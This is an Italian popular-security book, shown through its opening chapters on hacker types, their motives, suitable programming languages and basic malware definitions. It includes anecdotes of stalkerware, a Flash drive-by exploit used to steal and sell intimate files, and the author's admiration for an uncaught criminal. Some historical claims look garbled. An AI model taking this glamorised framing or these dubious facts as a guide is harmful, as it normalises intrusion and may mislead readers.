Hacker

Manuale
Difensivo

W. BRIAN P. LOSITO
Copyright © 2016 Walter Brian Picciuti Losito
Tutti i diritti riservati.
ISBN: 153772052X
ISBN-13: 978-1537720524
 DEDICA
Ai compagni di avventura che mi hanno tenuto
compagnia nei momenti bui, alle nostre infinite notti
passate al pc, ad amici e nemici che hanno contribuito a rendere l’esperienza
indimenticabile
Declinazione Di Responsabilità

Le informazioni contenute in questo libro sono intese e devono essere

utilizzate solo a scopo didattico, l’autore non si assume nessuna
responsabilità per la messa in pratica delle informazioni da parte del lettore.

Questo libro non vuole incoraggiare attività illegali, ma solo informare

l’utente delle tattiche che utilizzano gli hacker per entrare in possesso di
informazioni sensibili.

Venendo a conoscenza di queste informazioni il lettore potrà

comprendere e adottare le giuste contromisure per evitare un potenziale
attacco, di nuovo l’autore declina ogni responsabilità
Note Legali

Tutti i diritti sono riservati a norma di legge e a norma delle convenzioni

internazionali. Nessuna parte di questo libro può essere riprodotta in nessuna
forma e con qualsiasi mezzo, elettronico, meccanico o altro senza il permesso
scritto del detentore dei diritti.

Tutti i marchi riportati in questo libro appartengono ai legittimi

proprietari, marchi di terzi, nomi di prodotti, nomi commerciali, nomi
corporativi e società citate possono essere marchi di proprietà dei rispettivi
titolari o marchi registrati da altre società e sono stati utilizzati a puro scopo
esplicativo e a beneficio del lettore, senza alcun fine della violazione delle
leggi sul copyright
vigenti.
 Tabella dei contenuti

Prolusione
Capitolo 1: Chi È L’Hacker Davvero?
Capitolo 2: Nella Mente Di Un Hacker
Capitolo 3: Vari Tipi Di Malware E Come Funzionano
Capitolo 4: Il Funzionamento Degli Antivirus
Capitolo 5: In Che Modo Gli Hacker Scavalcano Gli Antivirus
Capitolo 6: Canali Di Distribuzione Più Utilizzati
Capitolo 7: Adottare Misure Proattive e Retroattive Per Proteggersi Da
Infezioni
Capitolo 8: Ripulire il Computer Da Malware
Capitolo 9: Operazione Honeypots
Capitolo 10: In Che Modo Rintracciare L’Hacker
Capitolo 11: Come Ti Rubano La Password
Capitolo 12: Anonimato E Protezione Dati Sensibili
Capitolo 13: Pericoli Delle Reti Wi-Fi Che Non Ti Aspetti
Capitolo 14: DeepWeb, DarkNet e Bitcoin
Parole Finali
Pagina lasciata bianca di proposito
 Prolusione

Prima di buttarci a capofitto nella materia, vorrei spendere due parole per
farti capire meglio la mia storia e perché questo sarà il libro più pratico ed
efficacie che leggerai.

Non sono un semplice consulente, di fatto all’età di 14 anni ho iniziato

il mio viaggio nel mondo dell’hacking, come molti ragazzi di quell’età non
ero pienamente cosciente di ciò che facevo, ma adoravo quella sensazione di
onnipotenza che provavo quando riuscivo ad entrare in un sistema, dare
un’occhiata e svanire, senza lasciare nessuna traccia.

Quando si fanno certe cose, si scoprono varie comunità nascoste dove si

riuniscono persone con gli stessi interessi, lì ho conosciuto molte persone,
soprattutto coetanei, ma erano molto diversi da me, non condividevano le mie
idee.

Per me non aveva senso entrare in un sistema e distruggere il lavoro di

altre persone, ironicamente quasi tutte le persone che conobbi in quel mondo
avevano ideali di distruzione, entrare in un computer non era la fine di una
sfida per loro, ma bensì l’inizio, non facevano altro che cercare nuovi sistemi
per rovinare il lavoro e la vita di altre persone.

Prima di allontanarmi da quelle comunità che non rispecchiavano il mio

modo di pensare, ho conosciuto 3 coetanei che stranamente condividevano i
miei stessi ideali, questi tre “amici” mi hanno accompagnato in una delle fasi
più delicate della mia vita, sono stato fortunato a conoscerli e condividere con
loro le nostre reciproche conoscenze ed esperienze, se non li avessi
conosciuti probabilmente non sarei mai arrivato a scrivere questo libro.

Assieme abbiamo giocato, scoperto cose nuove, studiato e pubblicato

varie vulnerabilità su siti leader incentrati sulla sicurezza web (es:
packetstormsecurity.com) tra cui vulnerabilità XSS/SQL su sistemi PHP
come aMember e molti altri.

Non posso rivelare nomi o dati specifici per ovvie ragioni, in questi anni
stiamo osservando il declino della privacy, quando ho iniziato, l’hacking era
molto più difficile, non c’erano tutte queste informazioni, inoltre i social
network permettono a chi è del “mestiere” di studiare la potenziale “vittima”
pianificare e lanciare un attacco.

È da molti anni ormai che mi sono allontanato da quel mondo e come

me i miei compagni d’avventura hanno preso strade diverse, ma questa è
un’altra storia.

Sono fiero del mio passato, non è stato tutto rosa e fiori, ma ora
posseggo delle capacità e delle conoscenze che mi permettono di proteggere
le mie informazioni, famiglia e lavoro da attacchi di malintenzionati, ed è
questo quello che questo manuale vuole essere, un approccio senza fronzoli
alla sicurezza, informazioni pratiche che puoi applicare per rendere più sicuro
il tuo ambiente di lavoro o pc personale, sono sicuro che appena completerai
questa breve lettura, sarai in grado di proteggere la tua famiglia e te stesso da
intrusioni e violazioni della privacy indesiderate.

Buona lettura
 Capitolo 1: Chi È L’Hacker Davvero?

Conoscere l’hacker è il primo passo per pianificare una difesa efficace, in

genere la società vede l’hacker come il personaggio dei film che preme tasti a
caso sulla tastiera e istantaneamente entra in un sistema o programma come
se stesse scrivendo un romanzo, questa rappresentazione è ridicola, i media
non si curano di specificare e rendere più chiara la sua immagine, l’Hacking è
un lavoro legale e pagato, il fatto che molte persone usino queste capacità per
compiere atti illegali, è un altro paio di maniche.

Il giusto significato della parola hacker si può racchiudere in questa

breve frase:

“L’Hacker è quella persona che ha come obiettivo la

modifica delle funzionalità di un sistema con il fine di alterarle e
fargli fare qualcosa di diverso rispetto al suo uso originario”

Una di quelle persone che ha ispirato questa citazione è stato il famoso

hacker di telefoni (phreaking) John Draper, che negli anni settanta ha
scoperto un modo per telefonare gratis utilizzando la rete AT&T, dato che a
quei tempi la rete funzionava attraverso i toni (hertz) scoprì che grazie ad un
fischietto contenuto in una scatola di cereali, poteva ricreare un suono a
2600hz il quale gli permetteva di resettare il terminale e di ricevere ed
effettuare chiamate a costo zero.

Dopo qualche tempo inventò la blue box, che automatizzava il processo

di produzione dei suoni, rendendo ancora più facile telefonare gratis, nel
1972 venne accusato di truffa e lo rinchiusero per cinque anni, secondo il
Wall Street Journal durante gli anni di carcere, scrisse il codice per il primo
processore utilizzato da Apple computer sulla carta igienica che in seguito
chiamò EasyWriter, e una volta fuori di prigione nel 1978, lo ha ricopiato a
computer.
 Ma gli hacker non sono tutti uguali, differenziano per comportamento,
vediamoli assieme:

Questi sono i cattivi, in genere sono quelli responsabili del 99% degli attacchi
da cui imparerai a difenderti, distruggono i sistemi ai quali hanno accesso per
divertimento o soddisfazione personali, purtroppo nelle comunità
underground sono considerati “fighi” quindi chiunque si avvicini al mondo
del hacking viene in qualche modo influenzato ad agire come loro.

Ci sono molti black hat in passato che hanno compiuto imprese a dir
poco straordinarie, come Gary McKinnon che ha perpetrato il più grande
attacco militare nella storia penetrando in più di 95 computer della NASA,
rendendo inutilizzabili 2,000 computer del distretto militare degli USA ed
infine reso 300 computer del USA Navy inoperabili.

Ma la storia che mi ha colpito di più è quella di Jonathan James, un

ragazzo di 16 anni che ha hackerato i computer della NASA e del
Dipartimento Della Difesa degli Stati Uniti, captando 3,000 messaggi segreti,
contenti password e chissà cos’altro.

Entrambi questi hacker sono stati piegati dal sistema giudiziario, Gary
McKinnon ha subito un grave crollo psicologico, mentre Jonathan James si è
suicidato a 25 anni, perché appunto terrorizzato dal sistema giudiziario.

Ci sono persone che pensano che questi due individui si sono meritati la
loro sorte, perché hanno infranto la legge, è un’opinione e come tale va
rispettata, ma personalmente io sono di un altro parere.
 Credo che hacker di questo calibro, che compiono imprese così fuori dal
comune, debbano essere aiutate e indirizzate verso qualcosa di produttivo,
immagina se queste due persone avessero avuto una guida che li avesse
indirizzati verso qualcosa di positivo e avessero sfruttato il loro talento in
modo legale cosa avrebbero potuto offrire all’umanità.

Ce ne sono stati molti come questi due, ci tengo a specificare però che
parlo solo di una cerchia ristretta di black hat, l’hacker che ruba, il comune
ladro informatico deve pagare per i suoi crimini.

Per me i veri black hat, sono quelli di cui non conosciamo l’esistenza,
tutti i migliori hacker e le loro imprese le conosciamo al giorno d’oggi perché
sono stati presi, mentre ci sono black hat eccezionali che agiscono
indisturbati, magari hanno eccelso più degli hacker famosi che conosciamo
oggi, ciò vuol dire che non sono stati solo dei geni con il computer, ma anche
estremamente furbi.

A questo proposito, nella mia adolescenza ne conobbi uno in carne ed

ossa, uno di quelli non solo bravi, ma anche furbi.

Per farla breve, questa persona affermava di aver violato 10,000 conti
correnti ed ogni mese prelevava un 1 dollaro da ognuno, cosa decisamente
più furba di rubare 10,000 dollari da un solo conto, azione che
metaforicamente hanno fatto tutti quelli che sono stati presi.

Sfortunatamente i black hat vantano una grossa fetta della comunità

hacking e vengono motivati spesso da avarizia e vendetta, in questo libro la
parola Hacker sarà riferita specificatamente al Black Hat.
I Gray Hat sono quelli nel mezzo e anche i più numerosi, non entrano in un
sistema per fare danni, ma non chiedono neanche il permesso prima di entrare
quindi eseguono comunque un’azione illegale.

Ho conosciuto molti gray hat durante il mio percorso, e se potessi

scegliere due parole per descriverli, sarebbe “guardoni aggressivi”, perché? I
gray hat sono le persone che entrano in un pc per avere un grande fratello
personalizzato, far parte della vita di un’altra persona, e lo fanno nel modo
più inquietante di tutti.

Prima si accontentano di guardare la vittima tramite webcam per

svariate ore al giorno, molto spesso registrano i video per conservali, caso
mai perdessero l’accesso alla macchina in modo da poter rivivere di continuo
l’esperienza, dopo di chi attivano il microfono per spiare le conversazioni,
ascoltano la vittima mentre parla a telefono e nei suoi momenti più intimi, ma
non è tutto, tutti i log e i tasti che vengono premuti sulla tastiera vengono
registrati spediti tramite email, quindi può comodamente leggere tutto quello
che la vittima scrive dovunque si trovi.

Dopo un po’ i gray hat non si accontentano solo di guardare, vogliono

partecipare ed entrare in contatto con la vittima, e cominciano facendo aprire
delle pagine web sul computer della vittima, per vedere alcune reazioni,
direttamente dalla webcam, in questo modo imparano a conoscere la vittima,
e questo per adesso è sufficiente.
Man mano i tentativi di farsi notare diventano sempre più violenti, dopo
un po' vorranno far sentire la loro presenza in modo maggiore, quindi
cominceranno a recuperare tutte le password presenti sul pc della vittima,
cercando di estendere il dominio sulla preda partecipando alla sua vita in una
maniera più attiva.
 Nelle fasi finali, cercano di aprire una forma di comunicazione più
diretta, avviano una chat remota, o parlano tramite il microfono del computer,
durante questo ultimo stadio, si perde il controllo sulla vittima dato che ormai
è completamente cosciente che un’altra persona la sta spiando, questo è anche
il momento dove la maggior parte dei gray hat vene beccata e arrestata, o
semplicemente esclusa dal sistema.

Esistono veri e propri mercati dove persone del genere scambiano foto e
video delle proprie vittime, ed in casi estremi, vendono l’accesso al computer
del malcapitato ad altri hacker, per permettere anche a loro di condividere
l’esperienza.
Questi sono gli “eroi” della rete, spendono il proprio tempo cercando
vulnerabilità nei sistemi più utilizzati per rendere il web più sicuro per tutti,
sono spesso rivali dei Black Hat in quanto cercano di batterli sul tempo
scoprendo prima gli exploit e notificandoli prontamente al gestore della
piattaforma, lavorando con lui per risolvere il bug, ed infine rilasciare la
vulnerabilità.

Un esempio interessante è quello di Tsutomu Shimomura, il white hat

che ha aiutato l’FBI nella cattura di Kevin Mitnick, il famoso social
engineering, i conflitti hacker contro hacker sono sempre interessanti, come
una partita a scacchi, in questo caso lo scacco matto di Tsutomu, consisteva
nell’aver hackerato un telefono in modo da poter ascoltare le telefonate di
Mitnick, geniale.

Il white hat dei giorni nostri, trova un posto di lavoro in un’azienda di

Penetration Testing, o la possiede, come Kevin Mitnick.

Ma cosa fa un’azienda di Pen Testing? Si occupa di testare la sicurezza

di qualsiasi aspetto dell’azienda che li assume, come per esempio un sito
web, un server o una web app.

Si richiede un servizio del genere per testare il proprio sistema, se il Pen

tester riesce a penetrare, chiuderà i buchi impedendo a malintenzionati di
entrare.

Questi ultimi si fanno pagare per le proprie conoscenze, mentre in giro

c’è un altro tipo di white hat che passa il tempo a testare le vulnerabilità di un
CMS o piattaforma online, solo per rendere il web un posto più sicuro.
 Spesso i White Hat hanno anni di esperienza con il computer e riescono
a risolvere qualsiasi problema si presenti sul sistema.

Queste che abbiamo visto sono le classificazioni in base al livello

comportamentale dell’hacker, questi che ora leggerai sono i nomi etichetta
che danno stesso le comunità underground in base alla preparazione:

Script kiddies – Questi sono aspiranti hacker. Sono guardati dall’alto in

basso dalla comunità underground perché il loro atteggiamento mette in
cattiva luce chi usa le proprie capacità per fare del bene e creare qualcosa di
costruttivo, gli Script Kiddies di solito non hanno alcuna conoscenza in
termini di Hacking e non conoscono nessun linguaggio di programmazione,
si limitano ad utilizzare programmi già disponibili e fare danni.

Hacker Intermedi – Questo tipo di persone hanno conoscenze medie

rispetto ai sistemi e linguaggi di programmazione, sanno come funziona un
programma quando lo usano ma come gli Script Kiddies si limitano ad
utilizzarlo per fare danni senza dare nessun contributo alla comunità.

Hacker D’Élite – Ovviamente questi sono quelli che sanno, esperti

programmatori e conoscitori della rete, utilizzano le loro conoscenze per
creare programmi, Malware e altri tools per fare danni, quegli stessi strumenti
che utilizzano gli script kiddies e gli hacker intermedi.
 Capitolo 2: Nella Mente Di Un Hacker

Non è facile rispondere, ma questo ti aiuterà a comprendere il perché di

determinate azioni. In questo libro parleremo prevalentemente dei Black Hat
in quanto è loro che vogliamo tenere fuori dai nostri computer.

La principale motivazione che spinge un hacker a fare quello che fa è la

sete di potere, gode che il popolo di internet parli di lui, esistono dei forum
solo su invito, dove solo un ristretto numero di persone può avere accesso, in
questi luoghi gli hacker scambiano le foto delle vittime, dati personali, carte
di credito e qualsiasi password l’hacker sia riuscito a estrarre dal sistema
vantandosi di come hanno infettato o raggirato la vittima.

Gli hacker fanno quello che fanno per due motivi:

Arricchirsi

La maggior parte degli attacchi che subirai sarà incentrata su questa

motivazione, probabilmente l’attacco con questo genere di motivazione verrà
perpetrato da hackers in gamba, in genere i Black Hat una volta penetrati nel
tuo sistema, lo scansioneranno a fondo cercando di trovare qualsiasi
informazione gli sia utile a fare soldi, come per esempio le tue credenziali
bancarie o il tuo numero di carta di credito, possono rivolgersi ad un servizio
online per creare un clone della tua carta e iniziare a spendere, ma questa è la
parte meno inquietante.

Il ricordo è ancora vivo dentro di me se ci penso, io e i miei amici ci

radunavamo spesso in un canale IRC anonimo per parlare, non perché ci
servisse essere anonimi, ma perché a quei tempi faceva cool e ospitavamo
anche altri hacker per condividere conoscenze e informazioni, alcune volte la
chat si trasformava in un vero e proprio confessionale, per entrare nel canale,
la password era nascosta in un indovinello matematico e chi riusciva a
scoprire la password era libero di entrare, tra i tanti che entravano e
confessavano le cose che avevano fatto, ce ne fu uno che mi lasciò turbato.

Un giorno nel nostro canale entrò un tale di nome Molizer, lo

conoscevo discretamente, i miei amici invece non lo avevano mai sentito, era
uno che non si faceva scrupoli, ma neanche quello che sapevo di lui mi
preparò a leggere quello che aveva da dire.

Prima che entrasse nel canale, sapevo che lui era solito scansionare i
computer delle vittime con l’obiettivo di cercare immagini di carte d’identità,
patenti bollette telefoniche e altri documenti, con l’intento di chiedere prestiti,
creare carte di credito a nome della vittima in modo da usarle per attività
fraudolente e rimanere anonimo, ogni cosa illecita che richiedesse documenti
ufficiali, lui la faceva.

Insomma era un puro black hat, quando entrò in chat esordì scrivendo
se a qualcuno interessava sapere come aveva guadagnato 2,000 euro in 20
minuti, il nostro gruppo era formato da adolescenti, massimo 16 anni, lui era
molto più grande ma acconsentimmo, la curiosità era troppa.

Venendo diritto al punto, aveva sviluppato un exploit silenzioso per una

recente versione di flash, detto semplicemente, ogni persone che navigava su
un sito dove era presente questo exploit, veniva infettato istantaneamente,
niente avvisi, niente file da cliccare, niente scampo.

Aveva inserito questo exploit in una decina di siti per scambi di coppie,
una volta avuto accesso a una quantità esponenziale di macchine, programmò
uno script in python per ricercare e salvare su un VPS anonimo tutti i file
presenti nei pc delle vittime che riguardassero foto pornografiche della
coppia.
 Nella mia ingenuità di un tempo non riuscivo a capirne il senso, come
può una persona fare molti soldi rubando immagini e video privati di una
ignara coppia, la risposta non ha tardato ad arrivare, tutti i file venivano
catalogati e venduti a vari siti per adulti che accettavano contenuti amatoriali,
e veniva pagato profumatamente.

I soldi sono un motivatore potente, la rete è piena di persone come

Molizer, hacker con grandi capacità al servizio del lato oscuro della forza,
abbiamo sempre avuto un buon rapporto, era un tipo solitario, con un
umorismo nero come la pece.

In verità per me è stato un modello da seguire, non per quello che

faceva, ma per come lo faceva, era dedicato, bravo, non mollava l’osso fin
quando non aveva ottenuto quello che voleva, ma cosa più importante non è
stato mai rintracciato, mi ha insegnato che è opportuno avere due identità
definite per la vita reale e l’hacking, più avanti vedremo come le tecniche di
anonimato che hanno permesso a Molizer di non essere mai scoperto.
Vendetta

Questo è il movente che preferisco vedere nelle persone, non perché la

ritengo una cosa giusta, ma perché vedere aspiranti hacker che scaricano
qualche programma gratis su internet dichiarandosi tali, mi diverte.

I miei amici erano al corrente che il computer era la mia unica fede,
quindi qualsiasi cosa succedesse ai loro computer, ero sempre in prima linea,
non perché volessi starci, spesso mi ci mettevano loro.

Le persone come me sanno che essere quello “bravo” al computer, ti

porta tutta una serie di oneri nei confronti dei pc dei tuoi amici e familiari,
come se avessimo scritto in fronte, “io aggiusto computer”.

Tralasciando i soliti noti, dato che i miei amici conoscevano le mie

capacità, spesso e volentieri chiedevano il mio aiuto ogni volta che volevano
infastidire qualcuno:

“Il bullo della classe ti ha dato fastidio? Chiama Brian e

vedi se può fare qualcosa.”

“Vuoi spiare la tua ex, o la tua attuale fidanzata per vedere

se ti tradisce? Chiedi a Brian e vedi se ti può aiutare”

Ora fin quando è una persona esperta a gestire la situazione, che non è
coinvolta in modo personale con la vittima, va tutto bene, ma cosa succede
quando ad effettuare un’intrusione è una persona che la prende sul personale
e che non è istruita propriamente?
 Ho sempre rifiutato questo genere di richieste, ma non potevo
persuadere i miei amici a rinunciare e spegnere il fuoco della vendetta, quindi
spesso e volentieri mi chiedevano dei consigli, volevano che gli spiegassi
tutto in 5 minuti, cosa naturalmente non possibile, quindi sentivano quello
che volevano sentire e si cimentavano nell’impresa.

C’è un episodio in particolare che ogni tanto torna vivido nella mia
mente, prima ho detto che se qualcuno hackera una vittima verso la quale
prova astio, molto probabilmente andrà tutto male, ed è esattamente quello
che è successo.

Il mio amico, che per la cronaca chiameremo “Giuseppe” non si è mai

fidato della sua fidanzata, erano ai ferri corti perché lui era estremamente
geloso, quindi cercava in tutti i modi di spiarla, decise in seguito di mettere in
pratica alcune informazioni che mi aveva sentito divulgare casualmente nel
gruppo.

Voleva infettare il suo computer con un programma di amministrazione

remota, cosa facile dato che aveva libero accesso al suo pc, utilizzò un trojan
di nome Netbus, il giorno dopo, la sua ragazza troncò la relazione, lui era
furioso, quasi non lo riconoscevo.

La sera seguente venne a lamentarsi nel gruppo, dicendo che ora che
aveva accesso al suo pc gliel’avrebbe fatta pagare.

Cercai di dissuaderlo ma non c’era verso, sapevo che avrebbe

combinato qualcosa di grave, il mattino dopo a scuola, per terra c’erano delle
foto private della fidanzata, stampate e incollate sporadicamente in alcune
classi, a qual punto capii che l’aveva fatta grossa, le lezioni si interruppero e
la professoressa dell’epoca chiamò la polizia, ed essendo fotografie di una
minorenne la situazione era piuttosto grave.
 La polizia interrogò la classe per avere qualche informazione,
fortunatamente i miei amici confessarono tutto prima che gli agenti
arrivassero ad interrogare me, non che avessi qualcosa da nascondere ma in
quell’età avevo un rapporto un po' conflittuale con l’autorità.

Per confermare la testimonianza ispezionarono il computer della

ragazza, trovarono i log dell’intrusione, rintracciarono Giuseppe facilmente e
ci fu una pesante denuncia di violazione della privacy, e del Computer Act.

Tutto questo per giungere ad una lezione, a Giuseppe probabilmente

non sarebbe capitato nulla se non avesse lasciato che i sentimenti
interferissero con la situazione, un bravo hacker è un hacker invisibile, ho
conosciuto molte persone che quando entrano in un sistema, prendono in giro
la vittima bloccandogli il mouse, la tastiera, aprendo pagine web a caso e
tutta una serie di cose, questo atteggiamento è più presente negli hacker
inesperti o ragazzini che si avvicinano per la prima volta.
Ma a prescindere dal cappello indossato o dal movente che si utilizza,
ogni hacker deve essere tutt’uno con la macchina, necessita di conoscere più
linguaggi di programmazione per sapersi muovere in qualsiasi circostanza,
deve saper creare tools ad hoc per qualsiasi situazione e conoscere quelli
disponibili sul mercato.

Parlando di linguaggi di programmazione, molti mi chiedono qual è il

migliore linguaggio da imparare, la verità è che non ne esiste uno,
specialmente per un hacker.

Dipende da quello che intendi creare, o distruggere, il tuo obiettivo è

Windows o MacOs? Android o IOS? Per ogni piattaforma un nuovo
linguaggio deve essere imparato.

Molti aspiranti hacker iniziano a programmare con l’obiettivo di creare

Malware, ma non è così semplice, di fatto la maggior parte fallisce perché si
aspetta risultati immeditati, imparare un linguaggio è un processo lento, che
richiede tanta pratica, ecco i linguaggi più utilizzati:

• C++/C: Il C++ è un ottimo linguaggio per iniziare, non è semplice ma

una volta appreso il funzionamento sarà più facile imparare gli altri linguaggi
in quanto sfrutta la struttura OOP (object oriented programming), per quanto
riguarda il C, è una variante più complessa del C++, ma con essa si possono
programmare Malware più veloci ed efficienti, un Malware programmato con
questi linguaggi è eseguibile solo in ambiente Windows ed è possibile creare
qualsiasi Malware esistente sul mercato oggi.

• ASM: Il famoso linguaggio Assembler, il più difficile e complesso che

si possa imparare, questa abitualmente è l’ultima tappa di un percorso che ha
come obiettivo la produzione di Malware e il reverse engineering ossia
l’analisi di quest’ultimo se sei un white hat. Questo linguaggio ha il
vantaggio di essere incredibilmente veloce e leggero, in quanto non ha
bisogno di compilatori ma si esegue automaticamente a livello macchina, e si
basa sul tipo di processore che si utilizza (x64 x86), quindi funziona in
qualche circostanze anche su MacOs, si utilizza per creare Worms, virus e
Adware, Crypter e via discorrendo.

• Java: Questo linguaggio è semplice da imparare ed è la scelta perfetta

se si vuole produrre Malware che funzioni su più piattaforme, ossia
Windows, MacOs, Linux e Android, e pressoché qualsiasi congegno
elettronico che usi Java, è come se si programmasse una sola volta per tutte le
piattaforme e per quanto riguarda il Malware, quello programmato in Java è
molto difficile da rilevare per gli antivirus, e quindi lo rende un linguaggio
base da conoscere, ma Java ha anche delle pecche, è un linguaggio lento e
pesante.

• Python: È il linguaggio perfetto per chi inizia e non ha la mentalità da

programmatore o non ha mai studiato nessun linguaggio di programmazione
prima, è facile da imparare ed estremamente potente, talmente potente che è
possibile creare giochi completi in 3d. Quello che contraddistingue il python
dagli altri è la sua versatilità, si può creare qualsiasi cosa con poche linee di
codice, è usato spesso dai Pen Tester per sviluppare exploit, ma può essere
usato davvero per tutto.

Ho cercato di ridurre le scelte all’osso, in quanto più opzioni si

presentano, meno possibilità ci sono che si faccia una scelta, inizialmente ho
provato difficoltà perché mi buttavo su vari linguaggi senza conoscerne uno
alla perfezione, in seguito mi è stato suggerito di iniziare con il python,
partire con qualcosa di concreto da creare, e di non cambiare fin quando non
lo avessi imparato alla perfezione, ho seguito il consiglio, e mi è stato molto
più facile imparare altri linguaggi.

Ma i linguaggi di programmazione sono solo una delle cose che deve

conoscere un hacker, una volta creato un codice, è importante crittografarlo
per evitare che altre persone rubino il codice e gli antivirus possano
scannerizzare la source del programma.

In seguito, un hacker è anche uno studioso della natura umana, i

computer vengono creati ad immagine degli uomini, il modo in cui i
computer elaborano i linguaggi è simile al nostro modo di pensare ed
elaborare le cose.

Inoltre l’hacker non utilizza mai Windows, ma per preservare il suo

anonimato e anche per i tools a disposizione, predilige Linux. Usare
Windows è rischioso, specialmente la versione 10, è stata accusata di spiare
gli utenti in svariati modi, e un hacker l’ultima cosa che vuole è essere spiato
da un’azienda che passa informazioni al governo.

Riassumendo e aggiungendo alcune cose, il background culturale di un

Hacker inoltre deve essere:
 C++ Java
Crittografia De crittografia
Proxy Socks
ASM Ingegneria Sociale
Linux Unix
FreeBSD Python

Visto che in questo libro parleremo solo di come entrare in un sistema

Windows, ho lasciato fuori altre discipline che servono per fare breccia in un
sito web o prendere possesso di un server.

Come vedi serve molto tempo e dedizione per diventare un hacker

esperto, probabilmente per ogni tematica descritta sopra, si può fare una
media di 1 o 2 anni ad argomento, e viene fuori un numero abbastanza
importante.

È importante sottolineare che solo una piccola parte dei Black Hat
possiede le conoscenze necessarie per essere chiamati Hacker, in genere la
maggior parte delle persone che si diverte ad entrare in un sistema e
distruggere oppure rubare carte di credito da un computer e prosciugare un
conto vengono chiamati in gergo come ho detto prima “Script Kiddies”.

Ma ora voglio spostare la tua attenzione su un manifesto molto

interessante che il solo leggerlo ti farà entrare nella mente di un famoso
hacker degli anni 70:

“Un altro è stato preso oggi, è su tutti i giornali. "Adolescente arrestato per
crimine informatico", "Hacker arrestato Per Manomissione Bancaria" ...

Maledetti ragazzi. Sono tutti uguali.

Ma avete, in tutti questi studi di psicologia che fate, provato a dare
un'occhiata a come si vede il mondo dagli occhi di un hacker? Vi siete mai
chiesti cosa lo fa scattare, quali forze lo condizionano e cosa può averlo
modellato?

Io sono un hacker, entrate nel mio mondo ...

Il mio è un mondo che inizia con la scuola ... Sono più sveglio di molti altri
ragazzi, quello che ci insegnano mi annoia ...

Dannati Ragazzi Svogliati. Sono tutti uguali.

Sono nelle scuole medie o superiori. Ho ascoltato gli insegnanti spiegare per
quindici volte come ridurre una frazione. Lo capisco. "No, Prof. Smith, io
non mostro il mio lavoro. L'ho fatto nella mia testa ..."

Dannato Ragazzo. Probabilmente lo ha copiato. Sono tutti uguali.

Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un secondo,

questo è fico. Fa quello che voglio io. Se da un errore, è perché io ho
sbagliato. Non perché non gli piaccio ... O si sente minacciato da me ... O
pensa che io sia un coglione .. O non gli piace insegnare e quindi non
dovrebbe essere qui ...

Dannato Ragazzo. Tutto quello che fa è giocare. Sono tutti uguali.

E poi è successo ... una porta si è aperta su un mondo ... correndo attraverso
le linee telefoniche come l'eroina nelle vene di un drogato, un impulso
elettronico è stato spedito, un rifugio dalle incompetenze che giorno per
giorno viene ricercata ... un rifugio è stato trovato. "Questo è ... questo è il
posto dove appartengo ..." Conosco tutti qui ... anche se non li ho mai
incontrati, mai parlato con loro, ... li conosco tutti ...

Dannato Ragazzo. Sempre Attaccato Alla Linea Telefonica. Sono tutti uguali
...

Puoi scommetterci il culo che siamo tutti uguali ... siamo stati nutriti con
cibo per bambini a scuola quando abbiamo fame di bistecca ... i pezzi di
carne che avete lasciato cadere erano premasticati e senza sapore. Noi
siamo stati dominati da sadici, ignorati e apatici. I pochi che avevano
qualcosa da insegnare, purtroppo sono come gocce d'acqua nel deserto.

Questo è il nostro mondo ... il mondo dell'elettrone e dello switch, la bellezza

del baud. Noi esploriamo ... e voi ci chiamate criminali. Noi cerchiamo la
conoscenza ... e voi ci chiamate criminali. Noi esistiamo senza colore della
pelle, senza nazionalità, senza pregiudizi religiosi ... e voi ci chiamate
criminali. Voi costruite bombe atomiche, finanziate guerre, voi uccidete,
ingannate e ci mentite facendoci credere che è per il nostro bene, eppure
siamo noi i criminali.

Sì, io sono un criminale. Il mio crimine è la curiosità. Il mio crimine è quello

di giudicare le persone per quello che dicono e pensano, non quello che
sembrano. Il mio crimine è quello di essere più intelligente di voi, qualcosa
che non mi sarà mai perdonato.

Io sono un hacker, e questo è il mio manifesto. Voi potete fermare questo

individuo, ma non potete fermarci tutti ... dopo tutto, siamo tutti uguali.”

Questo testo fu scritto da The Mentor nel 1989 poco dopo il suo arresto.

Essere Hacker vuol dire semplicemente farsi delle domande che in

genere gli altri non si pongono, come per esempio domandarsi cosa succede
in termini di hardware quando un computer si accende, o come fa un
programma a svolgere quella determinata funzione al livello di codice.

Molti ormai utilizzano il touch screen ogni giorno della loro vita, ma chi
ne conosce davvero il funzionamento, tutti ascoltano la musica, ma cosa c’è
dietro l’algoritmo di compressione mp3?

Questo significa essere hacker, in genere è possibile identificarne uno

vero dalla qualità delle sue domande, chiunque non si fermi alle apparenze e
vuole davvero imparare cosa c’è dietro le cose, può definirsi hacker.

Ora dopo aver chiarito la differenza tra tutti i tipi di Hacker e spogliato di
questo titolo chi non lo è, possiamo concentrarci su tutto quello che devi
sapere.
 Capitolo 3: Vari Tipi Di Malware E Come
Funzionano

Il tuo pc può essere attaccato da vari tipi di Malware, ognuno con uno scopo
diverso, probabilmente avrai già sentito questi termini in giro ma non ti sei
mai soffermato a capire davvero cosa facciano e quali siano le differenze,
questa sezione ti darà un quadro completo della situazione, iniziamo:

Virus

Un virus non è altro che un codice maligno che viene unito ad un programma
o file per essere eseguito, così come le infezioni umane, il virus può variare in
severità, nella maggior parte dei casi non si tratta quasi mai di problemi seri,
in altri invece può compromettere hardware, software (L’antivirus stesso) o
file vari, in più ha la capacità di moltiplicarsi infettando altri file exe.

La maggior parte dei virus come la stragrande maggioranza del

Malware viene diffusa in formato exe in più il virus non ha il potere di
diffondersi da solo ma per essere avviato ha bisogno dell’interazione umana,
ergo, se non clicchi il file infetto anche se quest’ultimo è sul tuo computer
non ha il potere di infettarti.

Ormai nessuno più utilizza virus per infettare un computer, in quanto

non servono ad uno scopo preciso ma solo a infastidire l’utente o a causare
danni, gli hacker oggi si concentrano su Malware più profittevoli che possono
dare un ritorno economico.

Uno dei virus più famosi negli ultimi anni è “ILOVEYOU”, fu uno dei
primi virus che ebbi la possibilità di analizzare e ammirarne la potenza
distruttiva, fece 10 biliardi di danni in tutto il suo ciclo di vita.

Il linguaggio utilizzato per programmare il virus fu Visual Basic Script

(vbs) non è un vero e proprio linguaggio di programmazione, ma più un
linguaggio di scripting.

Si presentava in una email dove faceva credere alla vittima che qualcuno
avesse scritto una lettera d’amore indirizzata a lui, una volta aperto,
danneggiava alcuni file di Windows rendendo impossibile il boot del sistema,
in più, corrompeva alcuni file word, inserendo alcune referenze ai Simpson,
inoltre si auto inviava a tutto i contatti di Outlook, una bella gatta da pelare.
Worm

I Worm sono molto simili ai Virus come architettura di codice ma in più,

hanno il potere di diffondersi da computer a computer senza l’interazione
umana, la minaccia più grande che presenta questo tipo di Malware è la sua
